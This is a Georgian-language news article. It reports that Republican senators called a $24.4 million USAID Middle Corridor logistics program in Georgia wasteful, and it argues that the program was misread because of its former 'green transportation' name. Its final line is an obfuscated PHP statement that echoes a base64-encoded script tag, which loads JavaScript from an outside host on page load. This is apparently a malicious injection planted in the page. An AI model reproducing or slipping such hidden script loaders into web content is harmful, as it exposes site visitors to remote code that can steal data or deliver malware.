tube
ავერსი jaluzi

USAID-ის მიერ მხარდაჭერილი პროგრამა, რომელიც მიზნად ისახავს საქართველოს შუა დერეფნის კორიდორის განვითარებას, რესპუბლიკელმა სენატორებმა ფლანგვად მოიხსენიეს.

საუბარია 24.4 მილიონი დოლარის ღირებულების პროექტზე, რომელსაც საქართველოში USAID-ის დაკვეთით Deloitte-ი ახორციელებს. პროექტის პირველი სახელი იყო USAID GREEN TRANSPORTATION AND LOGISTICS PROGRAM - "USAID-ის მწვანე ტრანსპორტისა და ლოგისტიკის პროგრამა", ხოლო მეორე და ამჟამინდელი სახელწოდებაა - USAID MIDDLE CORRIDOR TRANSPORTATION AND LOGISTICS PROGRAM-ი ანუ "USAID-ის შუა დერეფნის ტრანსპორტისა და ლოგისტიკის პროგრამა".

USAID-მა აღნიშნული პროგრამა 2024 წლის 15 თებერვალს დაიწყო და ის 4 წელზე არის გაწერილი. პროექტის ფარგლებში ამ დრომდე ათვისებული თანხა 8 მილიონ დოლარს შეადგენს.

"USAID-ის შუა დერეფნის ტრანსპორტისა და ლოგისტიკის პროგრამის მიზანია საქართველოს ეკონომიკისთვის ღირებულების გენერირება შუა დერეფნის გაძლიერებით,"- ნათქვამია პროექტის აღწერაში.

შესაბამისად, პროგრამის მიზანს საქართველოში მწვანე ტრანსპორტის და კონკრეტულად ელექტრომობილების მოხმარების ხელშეწყობა არ წარმოადგენს. სავარაუდოდ, პროექტის პირველადი სათაურიდან გამომდინარე ფლანგვის სიის შედგენისას ყურადღება გამახვილდა პროექტის პირველად სახელზე, რომელშიც მწვანე ტრანსპორტი ფიგურირებს, თუმცა თავად პროექტის არსებულ სახელში მწვანე ტრანსპორტი არაა და მის მიზანს ელექტრომობილებით გადაადგილების ხელშეწყობა არ წარმოადგენს.

რაც შეეხება შუა დერეფანს, ის საქართველოს სტრატეგიულ პროექტს წარმოადგენს, რომელიც მოიცავს ქვეყნის ლოგისტიკის ჯაჭვის განვითარებას, რაც გულისხმობს საგზაო, საპორტო, სარკინიგზო და სხვა ლოგისტიკური სექტორების განვითარებას იმისთვის, რათა საქართველომ უფრო აქტიური როლი ითამაშოს ევროპასა და აზიას შორის ვაჭრობაში. შუა დერეფნის და საქართველოს ლოგისტიკური შესაძლებლობის განვითარებისთვის სახელმწიფო ისეთი საერთაშორისო ორგანიზაციების დაფინანსებით, როგორიცაა მსოფლიო ბანკი, აზიის განვითარების ბანკი, ევროპის საინვესტიციო ბანკი, EBRD და სხვა საფინანსო ინსტიტუტები უმსხვილეს ინფრასტრუქტურულ პროექტებს ახორციელებს, რომელთა ჯამური ღირებულებაც $6 მილიარდს აღემატება. USAID-ის შუა დერეფნის პროგრამა საქართველოში ლოგისტიკური ჰაბის განვითარების ინსტიტუციურ მხარდაჭერას ისახავს მიზნად, რაც საერთაშორისო პარტნიორებთან დიალოგს, რეგულატორული ჩარჩოს განმტკიცებას და არსებული პრობლემების ინოვაციური გზებით გადაჭრას ისახავს მიზნად.

78
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");